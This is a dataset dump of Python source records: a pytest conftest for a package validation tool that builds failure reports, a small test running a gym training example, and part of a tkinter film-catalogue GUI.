This will also halt testing\nif a base failure is encountered (can be overridden with continue-on-failure)\n \"\"\"\n outcome = yield\n if outcome.get_result().when != \"call\":\n return # only capture results of test cases themselves\n result = TestResult(item, outcome)\n\n ALL_RESULTS.append(result)\n\n\ndef make_timestamp():\n \"\"\"\n :return: String timestamp in format:\n 2019-01-19 10:18:49.865000 Central Standard Time\n \"\"\"\n timezone = time.tzname[time.localtime().tm_isdst]\n return \"{} {}\".format(str(datetime.datetime.now()), timezone)\n\n\n# noinspection PyUnusedLocal\ndef pytest_sessionstart(session):\n ALL_RESULTS.clear()\n COLLECTION_FAILURES.clear()\n\n\n# noinspection PyUnusedLocal\ndef pytest_sessionfinish(session, exitstatus):\n \"\"\"\n If not a self-test run, generate the output reports\n \"\"\"\n if not session.config.option.package_dir:\n return\n\n if session.config.option.package_source:\n template_source = session.config.option.package_source\n else:\n template_source = os.path.abspath(session.config.option.package_dir)\n\n generate_report(\n get_output_dir(session.config),\n template_source,\n session.config.option.report_format,\n )\n\n\ndef make_href(paths, base_dir=None):\n \"\"\"\n Create an anchor tag to link to the file paths provided.\n :param paths: string or list of file paths\n :param base_dir: If specified this is pre-pended to each path\n :return: String of hrefs - one for each path, each separated by a line\n break (<br/>)\n \"\"\"\n paths = [paths] if isinstance(paths, string_types) else paths\n links = []\n for p in paths:\n abs_path = os.path.join(base_dir, p) if base_dir else p\n name = os.path.split(abs_path)[1]\n links.append(\n \"<a href='file://{abs_path}' target='_blank'>{name}</a>\".format(\n abs_path=abs_path, name=name\n )\n )\n return \"<br/>
\".join(links)\n\n\ndef generate_report(outpath, template_path, output_format=\"csv\"):\n \"\"\"\n Generates the various output reports.\n\n :param outpath: destination directory for all reports\n :param template_path: directory containing the CNF package validated\n :param output_format: One of \"html\", \"excel\", or \"csv\". Default is \"html\"\n :raises: ValueError if requested output format is unknown\n \"\"\"\n failures = [r for r in ALL_RESULTS if r.is_failed]\n generate_failure_file(outpath)\n output_format = output_format.lower().strip() if output_format else \"html\"\n generate_json(outpath, template_path)\n if output_format == \"html\":\n generate_html_report(outpath, template_path, failures)\n elif output_format == \"excel\":\n generate_excel_report(outpath, template_path, failures)\n elif output_format == \"json\":\n return\n elif output_format == \"csv\":\n generate_csv_report(outpath, template_path, failures)\n else:\n raise ValueError(\"Unsupported output format: \" + output_format)\n\n\ndef write_json(data, path):\n \"\"\"\n Pretty print data as JSON to the output path requested\n\n :param data: Data structure to be converted to JSON\n :param path: Where to write output\n \"\"\"\n with open(path, \"w\") as f:\n json.dump(data, f, indent=2)\n\n\ndef generate_failure_file(outpath):\n \"\"\"\n Writes a summary of test failures to a file named failures.\n This is for backwards compatibility only. The report.json offers a\n more comprehensive output.\n \"\"\"\n failure_path = os.path.join(outpath, \"failures\")\n failures = [r for r in ALL_RESULTS if r.is_failed]\n data = {}\n for i, fail in enumerate(failures):\n data[str(i)] = {\n \"file\": fail.files[0] if len(fail.files) == 1 else fail.files,\n \"vnfrqts\": fail.requirement_ids,\n \"test\": fail.test_case,\n \"test_file\": fail.test_module,\n \"raw_output\": fail.raw_output,\n \"message\": fail.error_message,\n }\n write_json(data, failure_path)\n\n\ndef generate_csv_report(output_dir, template_path, failures):\n rows = [[\"Validation Failures\"]]\n headers = [\n (\"Tool Version:\", version.VERSION),\n (\"Report Generated At:\", make_timestamp()),\n (\"Directory Validated:\", template_path),\n (\"Checksum:\", hash_directory(template_path)),\n (\"Total Errors:\", len(failures) + len(COLLECTION_FAILURES)),\n ]\n rows.append([])\n for header in headers:\n rows.append(header)\n rows.append([])\n\n if COLLECTION_FAILURES:\n rows.append([COLLECTION_FAILURE_WARNING])\n rows.append([\"Validation File\", \"Test\", \"Fixtures\", \"Error\"])\n for failure in COLLECTION_FAILURES:\n rows.append(\n [\n failure[\"module\"],\n failure[\"test\"],\n \";\".join(failure[\"fixtures\"]),\n failure[\"error\"],\n ]\n )\n rows.append([])\n\n # table header\n rows.append([col for col, _ in REPORT_COLUMNS])\n\n reqs = load_current_requirements()\n\n # table content\n for i, failure in enumerate(failures, start=1):\n rows.append(\n [\n i,\n \"\\n\".join(failure.files),\n failure.requirement_text(reqs),\n failure.error_message,\n failure.test_id,\n ]\n )\n\n output_path = os.path.join(output_dir, \"report.csv\")\n with open(output_path, \"w\", newline=\"\") as f:\n writer = csv.writer(f)\n for row in rows:\n writer.writerow(row)\n\n\ndef generate_excel_report(output_dir, template_path, failures):\n output_path = os.path.join(output_dir, \"report.xlsx\")\n workbook = xlsxwriter.Workbook(output_path)\n bold = workbook.add_format({\"bold\": True, \"align\": \"top\"})\n code = workbook.add_format(\n {\"font_name\": \"Courier\", \"text_wrap\": True, 
\"align\": \"top\"}\n )\n normal = workbook.add_format({\"text_wrap\": True, \"align\": \"top\"})\n heading = workbook.add_format({\"bold\": True, \"font_size\": 18})\n worksheet = workbook.add_worksheet(\"failures\")\n worksheet.write(0, 0, \"Validation Failures\", heading)\n\n headers = [\n (\"Tool Version:\", version.VERSION),\n (\"Report Generated At:\", make_timestamp()),\n (\"Directory Validated:\", template_path),\n (\"Checksum:\", hash_directory(template_path)),\n (\"Total Errors:\", len(failures) + len(COLLECTION_FAILURES)),\n ]\n for row, (header, value) in enumerate(headers, start=2):\n worksheet.write(row, 0, header, bold)\n worksheet.write(row, 1, value)\n\n worksheet.set_column(0, len(headers) - 1, 40)\n worksheet.set_column(len(headers), len(headers), 80)\n\n if COLLECTION_FAILURES:\n collection_failures_start = 2 + len(headers) + 2\n worksheet.write(collection_failures_start, 0, COLLECTION_FAILURE_WARNING, bold)\n collection_failure_headers = [\"Validation File\", \"Test\", \"Fixtures\", \"Error\"]\n for col_num, col_name in enumerate(collection_failure_headers):\n worksheet.write(collection_failures_start + 1, col_num, col_name, bold)\n for row, data in enumerate(COLLECTION_FAILURES, collection_failures_start + 2):\n worksheet.write(row, 0, data[\"module\"])\n worksheet.write(row, 1, data[\"test\"])\n worksheet.write(row, 2, \",\".join(data[\"fixtures\"]))\n worksheet.write(row, 3, data[\"error\"], code)\n\n # table header\n start_error_table_row = 2 + len(headers) + len(COLLECTION_FAILURES) + 4\n worksheet.write(start_error_table_row, 0, \"Validation Failures\", bold)\n for col_num, (col_name, _) in enumerate(REPORT_COLUMNS):\n worksheet.write(start_error_table_row + 1, col_num, col_name, bold)\n\n reqs = load_current_requirements()\n\n # table content\n for col, width in enumerate((20, 30, 60, 60, 40)):\n worksheet.set_column(col, col, width)\n err_num = 1\n for row, failure in enumerate(failures, start=start_error_table_row + 2):\n worksheet.write(row, 0, str(err_num), normal)\n worksheet.write(row, 1, \"\\n\".join(failure.files), normal)\n worksheet.write(row, 2, failure.requirement_text(reqs), normal)\n worksheet.write(row, 3, failure.error_message.replace(\"\\n\", \"\\n\\n\"), normal)\n worksheet.write(row, 4, failure.test_id, normal)\n err_num += 1\n worksheet.autofilter(\n start_error_table_row + 1,\n 0,\n start_error_table_row + 1 + err_num,\n len(REPORT_COLUMNS) - 1,\n )\n workbook.close()\n\n\ndef make_iso_timestamp():\n \"\"\"\n Creates a timestamp in ISO 8601 format in UTC format. Used for JSON output.\n \"\"\"\n now = datetime.datetime.utcnow()\n now.replace(tzinfo=datetime.timezone.utc)\n return now.isoformat()\n\n\ndef aggregate_results(outcomes, r_id=None):\n \"\"\"\n Determines the aggregate result for the conditions provided. 
Assumes the\n results have been filtered and collected for analysis.\n\n :param outcomes: set of outcomes from the TestResults\n :param r_id: Optional requirement ID if known\n :return: 'ERROR', 'PASS', 'FAIL', or 'SKIP'\n (see aggregate_requirement_adherence for more detail)\n \"\"\"\n if not outcomes:\n return \"PASS\"\n elif \"ERROR\" in outcomes:\n return \"ERROR\"\n elif \"FAIL\" in outcomes:\n return \"FAIL\"\n elif \"PASS\" in outcomes:\n return \"PASS\"\n elif {\"SKIP\"} == outcomes:\n return \"SKIP\"\n else:\n pytest.warns(\n \"Unexpected error aggregating outcomes ({}) for requirement {}\".format(\n outcomes, r_id\n )\n )\n return \"ERROR\"\n\n\ndef aggregate_run_results(collection_failures, test_results):\n \"\"\"\n Determines overall status of run based on all failures and results.\n\n * 'ERROR' - At least one collection failure occurred during the run.\n * 'FAIL' - Template failed at least one test\n * 'PASS' - All tests executed properly and no failures were detected\n\n :param collection_failures: failures occurring during test setup\n :param test_results: list of all test execution results\n :return: one of 'ERROR', 'FAIL', or 'PASS'\n \"\"\"\n if collection_failures:\n return \"ERROR\"\n elif any(r.is_failed for r in test_results):\n return \"FAIL\"\n else:\n return \"PASS\"\n\n\ndef relative_paths(base_dir, paths):\n return [os.path.relpath(p, base_dir) for p in paths if p != \"\"]\n\n\n# noinspection PyTypeChecker\ndef generate_json(outpath, template_path):\n \"\"\"\n Creates a JSON summary of the entire test run.\n \"\"\"\n reqs = load_current_requirements()\n data = {\n \"version\": \"dublin\",\n \"template_directory\": os.path.splitdrive(template_path)[1].replace(\n os.path.sep, \"/\"\n ),\n \"timestamp\": make_iso_timestamp(),\n \"checksum\": hash_directory(template_path),\n \"outcome\": aggregate_run_results(COLLECTION_FAILURES, ALL_RESULTS),\n \"tests\": [],\n \"requirements\": [],\n }\n\n results = data[\"tests\"]\n for result in COLLECTION_FAILURES:\n results.append(\n {\n \"files\": [],\n \"test_module\": result[\"module\"],\n \"test_case\": result[\"test\"],\n \"result\": \"ERROR\",\n \"error\": result[\"error\"],\n \"requirements\": result[\"requirements\"],\n }\n )\n for result in ALL_RESULTS:\n results.append(\n {\n \"files\": relative_paths(template_path, result.files),\n \"test_module\": result.test_module,\n \"test_case\": result.test_case,\n \"result\": result.outcome,\n \"error\": result.error_message if result.is_failed else \"\",\n \"requirements\": result.requirements_metadata(reqs),\n }\n )\n\n # Build a mapping of requirement ID to the results\n r_id_results = defaultdict(lambda: {\"errors\": set(), \"outcomes\": set()})\n for test_result in results:\n test_reqs = test_result[\"requirements\"]\n r_ids = (\n [r[\"id\"] if isinstance(r, dict) else r for r in test_reqs]\n if test_reqs\n else (\"\",)\n )\n for r_id in r_ids:\n item = r_id_results[r_id]\n item[\"outcomes\"].add(test_result[\"result\"])\n if test_result[\"error\"]:\n item[\"errors\"].add(test_result[\"error\"])\n\n requirements = data[\"requirements\"]\n for r_id, r_data in reqs.items():\n requirements.append(\n {\n \"id\": r_id,\n \"text\": r_data[\"description\"],\n \"keyword\": r_data[\"keyword\"],\n \"result\": aggregate_results(r_id_results[r_id][\"outcomes\"]),\n \"errors\": list(r_id_results[r_id][\"errors\"]),\n }\n )\n\n if r_id_results[\"\"][\"errors\"] or r_id_results[\"\"][\"outcomes\"]:\n requirements.append(\n {\n \"id\": \"Unmapped\",\n \"text\": \"Tests not mapped to 
requirements (see tests)\",\n \"result\": aggregate_results(r_id_results[\"\"][\"outcomes\"]),\n \"errors\": list(r_id_results[\"\"][\"errors\"]),\n }\n )\n\n report_path = os.path.join(outpath, \"report.json\")\n write_json(data, report_path)\n\n\ndef generate_html_report(outpath, template_path, failures):\n reqs = load_current_requirements()\n fail_data = []\n for failure in failures:\n fail_data.append(\n {\n \"file_links\": make_href(failure.files, template_path),\n \"test_id\": failure.test_id,\n \"error_message\": escape(failure.error_message).replace(\n \"\\n\", \"
<br/><br/>
\"\n ),\n \"raw_output\": escape(failure.raw_output),\n \"requirements\": docutils.core.publish_parts(\n writer_name=\"html\", source=failure.requirement_text(reqs)\n )[\"body\"],\n }\n )\n pkg_dir = os.path.split(__file__)[0]\n j2_template_path = os.path.join(pkg_dir, \"report.html.jinja2\")\n with open(j2_template_path, \"r\") as f:\n report_template = jinja2.Template(f.read())\n contents = report_template.render(\n version=version.VERSION,\n num_failures=len(failures) + len(COLLECTION_FAILURES),\n template_dir=make_href(template_path),\n checksum=hash_directory(template_path),\n timestamp=make_timestamp(),\n failures=fail_data,\n collection_failures=COLLECTION_FAILURES,\n )\n with open(os.path.join(outpath, \"report.html\"), \"w\") as f:\n f.write(contents)\n\n\ndef hash_directory(path):\n \"\"\"\n Create md5 hash using the contents of all files under ``path``\n :param path: string directory containing files\n :return: string MD5 hash code (hex)\n \"\"\"\n md5 = hashlib.md5() # nosec\n for dir_path, sub_dirs, filenames in os.walk(path):\n for filename in filenames:\n file_path = os.path.join(dir_path, filename)\n with open(file_path, \"rb\") as f:\n md5.update(f.read())\n return md5.hexdigest()\n\n\ndef load_current_requirements():\n \"\"\"Loads dict of current requirements or empty dict if file doesn't exist\"\"\"\n with io.open(CNF_REQUIREMENTS_FILE, encoding=\"utf8\", mode=\"r\") as f:\n data = json.load(f)\n version = data[\"current_version\"]\n return data[\"versions\"][version][\"needs\"]\n\n\ndef pytest_addoption(parser):\n parser.addoption(\n \"--package-directory\",\n dest=\"package_dir\",\n action=\"store\",\n help=\"Path to .zip file or directory which holds the package for validation\",\n )\n\n parser.addoption(\n \"--optional-tests-setting\",\n dest=\"optional_tests_setting\",\n action=\"store\",\n default=os.path.join(os.path.dirname(__file__), \"optional_tests_setting.yaml\"),\n help=\"Alternate file containing settings for additional tests\",\n )\n\n parser.addoption(\"--package-source\", dest=\"package_source\", action=\"store\")\n\n parser.addoption(\n \"--output-directory\",\n dest=\"output_dir\",\n action=\"store\",\n default=None,\n help=\"Alternate directory for report output.\",\n )\n\n parser.addoption(\n \"--report-format\",\n dest=\"report_format\",\n action=\"store\",\n help=\"Format of output report (html, csv, excel, json)\",\n )\n\n\ndef pytest_configure(config):\n global package_dir\n global optional_tests_settings\n if not (config.getoption(\"package_dir\") or config.getoption(\"help\")):\n raise Exception('\"--package-directory\" must be specified')\n\n input_path = config.getoption(\"package_dir\")\n assert os.path.exists(input_path), \"{} does not exist\".format(input_path)\n if os.path.isfile(input_path):\n assert zipfile.is_zipfile(\n input_path\n ), \"Input should be a zip file or a directory with package contents\"\n archive = zipfile.ZipFile(input_path)\n target_dir = tempfile.TemporaryDirectory().name\n archive.extractall(path=target_dir)\n package_dir = target_dir\n elif os.path.isdir(input_path):\n package_dir = input_path\n\n optional_tests_settings_file = config.getoption(\"optional_tests_setting\")\n assert os.path.isfile(optional_tests_settings_file)\n optional_tests_settings = yaml.safe_load(open(optional_tests_settings_file))\n\n helm_packages_list.extend(\n [\n p\n for p in os.scandir(package_dir)\n if p.name.startswith(\"helm\") and p.name.endswith(\".tgz\")\n ]\n )\n\n\ndef pytest_generate_tests(metafunc):\n global package_dir\n\n if 
\"package_dir\" in metafunc.fixturenames:\n metafunc.parametrize(\"package_dir\", [package_dir])\n\n if \"helm_package\" in metafunc.fixturenames:\n metafunc.parametrize(\"helm_package\", helm_packages_list)\n\n\n@pytest.fixture\ndef artifact_files(package_dir):\n files_list = os.scandir(package_dir)\n artifacts_list = [p for p in files_list if not p.name == \"MANIFEST.json\"]\n return artifacts_list\n\n\n@pytest.fixture\ndef manifest_schema_file():\n schema_file_path = os.path.join(os.path.dirname(__file__), \"manifest_schema.json\")\n if not os.path.exists(schema_file_path):\n raise RuntimeError(\n \"manifest_schema.json missing from 'tests' directory in validation tool\"\n )\n return open(schema_file_path)\n\n\n@pytest.fixture\ndef json_file(package_dir):\n json_path = os.path.join(package_dir, \"MANIFEST.json\")\n return open(json_path)\n\n\n@pytest.fixture\ndef json_data(json_file):\n json_data = json.load(json_file)\n return json_data\n", "sub_path": "ice_validator/tests_cnf/conftest.py", "file_name": "conftest.py", "file_ext": "py", "file_size_in_byte": 26968, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.basicConfig", "line_number": 40, "usage_type": "call"}, {"api_name": "logging.ERROR", "line_number": 40, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 57, "usage_type": "call"}, {"api_name": "boltons.funcutils.wraps", "line_number": 96, "usage_type": "call"}, {"api_name": "boltons.funcutils", "line_number": 96, "usage_type": "name"}, {"api_name": "re.match", "line_number": 116, "usage_type": "call"}, {"api_name": "re.MULTILINE", "line_number": 117, "usage_type": "attribute"}, {"api_name": "re.DOTALL", "line_number": 117, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 264, "usage_type": "call"}, {"api_name": "os.path", "line_number": 264, "usage_type": "attribute"}, {"api_name": "pytest.hookimpl", "line_number": 277, "usage_type": "call"}, {"api_name": "time.tzname", "line_number": 296, "usage_type": "attribute"}, {"api_name": "time.localtime", "line_number": 296, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 297, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 297, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 317, "usage_type": "call"}, {"api_name": "os.path", "line_number": 317, "usage_type": "attribute"}, {"api_name": "six.string_types", "line_number": 334, "usage_type": "argument"}, {"api_name": "os.path.join", "line_number": 336, "usage_type": "call"}, {"api_name": "os.path", "line_number": 336, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 339, "usage_type": "call"}, {"api_name": "os.path", "line_number": 339, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 340, "usage_type": "call"}, {"api_name": "os.path", "line_number": 340, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 340, 
"usage_type": "call"}, {"api_name": "json.dump", "line_number": 382, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 391, "usage_type": "call"}, {"api_name": "os.path", "line_number": 391, "usage_type": "attribute"}, {"api_name": "version.VERSION", "line_number": 409, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 451, "usage_type": "call"}, {"api_name": "os.path", "line_number": 451, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 453, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 459, "usage_type": "call"}, {"api_name": "os.path", "line_number": 459, "usage_type": "attribute"}, {"api_name": "xlsxwriter.Workbook", "line_number": 460, "usage_type": "call"}, {"api_name": "version.VERSION", "line_number": 471, "usage_type": "attribute"}, {"api_name": "datetime.datetime.utcnow", "line_number": 528, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 528, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 529, "usage_type": "attribute"}, {"api_name": "pytest.warns", "line_number": 554, "usage_type": "call"}, {"api_name": "os.path.relpath", "line_number": 583, "usage_type": "call"}, {"api_name": "os.path", "line_number": 583, "usage_type": "attribute"}, {"api_name": "os.path.splitdrive", "line_number": 594, "usage_type": "call"}, {"api_name": "os.path", "line_number": 594, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 595, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 629, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 665, "usage_type": "call"}, {"api_name": "os.path", "line_number": 665, "usage_type": "attribute"}, {"api_name": "cgi.escape", "line_number": 677, "usage_type": "call"}, {"api_name": "cgi.escape", "line_number": 680, "usage_type": "call"}, {"api_name": "docutils.core.core.publish_parts", "line_number": 681, "usage_type": "call"}, {"api_name": "docutils.core.core", "line_number": 681, "usage_type": "attribute"}, {"api_name": "docutils.core", "line_number": 681, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 686, "usage_type": "call"}, {"api_name": "os.path", "line_number": 686, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 687, "usage_type": "call"}, {"api_name": "os.path", "line_number": 687, "usage_type": "attribute"}, {"api_name": "jinja2.Template", "line_number": 689, "usage_type": "call"}, {"api_name": "version.VERSION", "line_number": 691, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 699, "usage_type": "call"}, {"api_name": "os.path", "line_number": 699, "usage_type": "attribute"}, {"api_name": "hashlib.md5", "line_number": 709, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 710, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 712, "usage_type": "call"}, {"api_name": "os.path", "line_number": 712, "usage_type": "attribute"}, {"api_name": "io.open", "line_number": 720, "usage_type": "call"}, {"api_name": "json.load", "line_number": 721, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 738, "usage_type": "call"}, {"api_name": "os.path", "line_number": 738, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 738, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 767, "usage_type": "call"}, {"api_name": "os.path", "line_number": 767, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 
768, "usage_type": "call"}, {"api_name": "os.path", "line_number": 768, "usage_type": "attribute"}, {"api_name": "zipfile.is_zipfile", "line_number": 769, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 772, "usage_type": "call"}, {"api_name": "tempfile.TemporaryDirectory", "line_number": 773, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 776, "usage_type": "call"}, {"api_name": "os.path", "line_number": 776, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 780, "usage_type": "call"}, {"api_name": "os.path", "line_number": 780, "usage_type": "attribute"}, {"api_name": "yaml.safe_load", "line_number": 781, "usage_type": "call"}, {"api_name": "os.scandir", "line_number": 786, "usage_type": "call"}, {"api_name": "os.scandir", "line_number": 804, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 802, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 811, "usage_type": "call"}, {"api_name": "os.path", "line_number": 811, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 811, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 812, "usage_type": "call"}, {"api_name": "os.path", "line_number": 812, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 809, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 821, "usage_type": "call"}, {"api_name": "os.path", "line_number": 821, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 819, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 827, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 825, "usage_type": "attribute"}]} +{"seq_id": "58902791", "text": "# -*- coding: utf-8 -*-\n# ------------------------------------------------------------------------------\n#\n# Copyright 2018-2019 Fetch.AI Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# ------------------------------------------------------------------------------\n\"\"\"The tests module contains the tests of the gym example.\"\"\"\n\nimport os\nimport sys\nfrom pathlib import Path\n\nfrom tests.common.pexpect_popen import PexpectWrapper\nfrom tests.common.utils import run_in_root_dir\n\n\n@run_in_root_dir\ndef test_gym_ex():\n \"\"\"Run the gym ex sequence.\"\"\"\n try:\n process = PexpectWrapper( # nosec\n [\n sys.executable,\n str(Path(\"examples/gym_ex/train.py\").resolve()),\n \"--nb-steps\",\n \"50\",\n ],\n env=os.environ.copy(),\n maxread=1,\n encoding=\"utf-8\",\n logfile=sys.stdout,\n )\n\n process.expect([\"Step 50/50\"], timeout=10)\n process.wait_to_complete(5)\n assert process.returncode == 0, \"Test failed\"\n finally:\n process.terminate()\n process.wait()\n", "sub_path": "tests/test_examples/test_gym_ex.py", "file_name": "test_gym_ex.py", "file_ext": "py", "file_size_in_byte": 1645, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": 
"tests.common.pexpect_popen.PexpectWrapper", "line_number": 33, "usage_type": "call"}, {"api_name": "sys.executable", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 36, "usage_type": "call"}, {"api_name": "os.environ.copy", "line_number": 40, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 40, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 43, "usage_type": "attribute"}, {"api_name": "tests.common.utils.run_in_root_dir", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "18881796", "text": "from tkinter import *\nfrom PIL import ImageTk, Image\nfrom db_init import write_file, genresTable, films, commentTable\nfrom tkinterCreate import create_genre_page, create_film_page\nimport json\nfrom datetime import date as date_module, datetime\n\ndef film_window(window, film_table, offset):\n\n def back():\n display.destroy()\n\n def open_genre_page():\n genre_window(window, genresTable)\n\n def open_next():\n film_window(window, film_table, offset+2)\n\n def open_prev():\n b = max(0, offset-2)\n film_window(window,film_table, b)\n\n def create_genre():\n create_genre_page(window)\n\n def create_film():\n create_film_page(window)\n\n display = Frame(window, height = 700, width=1300, bg=\"GREEN\")\n display.place(x=0, y=0)\n baseX = 100\n baseY = 100\n\n back = Button(display, text=\"back\", font=(\"Gotham\", \"15\"), command=back)\n back.place(x=20, y=10)\n\n genres = Button(display, text=\"genres\", font=(\"Gotham\", \"15\"), command=open_genre_page)\n genres.place(x=100, y=10)\n\n createGenre = Button(display, text=\"Create Genre\", font=(\"Gotham\", \"15\"), command=create_genre)\n createGenre.place(x=200, y=10)\n\n createFilm = Button(display, text=\"Create Film\", font=(\"Gotham\", \"15\"), command=create_film)\n createFilm.place(x=400, y=10)\n\n # сделать prevPage\n\n prevPage = Button(display, text=\"prev\", font=(\"Gotham\", \"15\"), command=open_prev)\n prevPage.place(x=450, y=600)\n\n nextPage = Button(display, text=\"next\", font=(\"Gotham\", \"15\"), command=open_next)\n nextPage.place(x=1000, y=600)\n\n def show_film(x, y, id, name, descr, rating, genre_id, photo, genre_title):\n\n def open_film_onclick(event):\n exact_film(window, id)\n\n namelbl = Label(display, text=name, font=(\"Gotham\", \"12\"))\n namelbl.place(x=x+230, y=y+10)\n namelbl.bind('', open_film_onclick)\n\n descrlbl = Label(display, text=descr, font=(\"Gotham\", \"12\"))\n descrlbl.place(x=x + 230, y=y+60)\n\n ratinglbl = Label(display, text=rating, font=(\"Gotham\", \"12\"))\n ratinglbl.place(x=x + 700, y=y+10)\n\n genrelbl = Label(display, text=genre_title, font=(\"Gotham\", \"12\"))\n genrelbl.place(x=x + 230, y=y+200)\n\n write_file(photo, name + \".jpg\")\n image1 = Image.open(name + \".jpg\")\n image1 = image1.resize((180, 240), Image.ANTIALIAS)\n test = ImageTk.PhotoImage(image1)\n label1 = Label(display, image=test, width=180, height=240)\n label1.image = test\n label1.place(x=x+10, y=y)\n\n films = film_table.get_films(offset)\n for film in films:\n id = film[0]\n name = film[1]\n descr = film[2]\n rating = film[3]\n genre_id = film[4]\n photo = film[5]\n genre_title = film[6]\n show_film(baseX, baseY, id, name, descr, rating, genre_id, photo, genre_title)\n baseY+=300\n\n\ndef genre_window(window, genre_table):\n def back():\n display.destroy()\n\n display = Frame(window, height = 700, width=1300)\n display.place(x=0, y=0)\n baseX = 100\n baseY = 100\n\n back = Button(display, text=\"back\", font=(\"Gotham\", \"15\"), 
command=back)\n back.place(x=20, y=10)\n\n\n def show_genre(x, y, id, name, descr):\n\n def get_films_by_genre():\n filmslist = films.get_films_by_genre(id, 0)\n filmlist_window(window, filmslist, id, 0)\n idlbl = Label(display, text=str(id), font=(\"Gotham\", \"12\"))\n idlbl.place(x=x + 90, y=y + 10)\n\n namelbl = Label(display, text=name, font=(\"Gotham\", \"12\"))\n namelbl.place(x=x+110, y=y+10)\n\n descrlbl = Label(display, text=descr, font=(\"Gotham\", \"12\"))\n descrlbl.place(x=x + 100, y=y+30)\n\n line = Canvas(display, width=1000, height=2, bg=\"BLUE\")\n line.place(x=x, y=y + 50)\n\n films_genre = Button(display, text=\"films\", command=get_films_by_genre)\n films_genre.place(x=x+700, y=y+10)\n\n genres = genre_table.get_genres()\n print(genres)\n for genre in genres:\n id = genre[0]\n name = genre[1]\n descr = genre[2]\n\n show_genre(baseX, baseY, id, name, descr)\n baseY+=60\n\ndef filmlist_window(window, filmlist, genre_id, offset):\n def back():\n display.destroy()\n\n def open_genre_page():\n genre_window(window, genresTable)\n\n def open_prev():\n global films\n b = max(0, offset-2)\n filmsList = films.get_films_by_genre(genre_id, b)\n filmlist_window(window, filmsList, genre_id, b)\n\n def open_next():\n global films\n filmsList = films.get_films_by_genre(genre_id, offset+2 )\n filmlist_window(window, filmsList, genre_id, offset+2)\n\n display = Frame(window, height = 700, width=1300)\n display.place(x=0, y=0)\n baseX = 100\n baseY = 100\n\n back = Button(display, text=\"back\", font=(\"Gotham\", \"15\"), command=back)\n back.place(x=20, y=10)\n\n genres = Button(display, text=\"genres\", font=(\"Gotham\", \"15\"), command=open_genre_page)\n genres.place(x=100, y=10)\n\n # TODO: make prevPage\n prevPage = Button(display, text=\"prev\", font=(\"Gotham\", \"15\"), command=open_prev)\n prevPage.place(x=450, y=600)\n\n nextPage = Button(display, text=\"next\", font=(\"Gotham\", \"15\"), command=open_next)\n nextPage.place(x=1000, y=600)\n\n def show_film(x, y, id, name, descr, rating, genre_id, photo, genre_title):\n namelbl = Label(display, text=name, font=(\"Gotham\", \"12\"))\n namelbl.place(x=x+230, y=y+10)\n\n descrlbl = Label(display, text=descr, font=(\"Gotham\", \"12\"))\n descrlbl.place(x=x + 230, y=y+60)\n\n ratinglbl = Label(display, text=rating, font=(\"Gotham\", \"12\"))\n ratinglbl.place(x=x + 700, y=y+10)\n\n genrelbl = Label(display, text=genre_title, font=(\"Gotham\", \"12\"))\n genrelbl.place(x=x + 230, y=y+200)\n\n write_file(photo, name + \".jpg\")\n image1 = 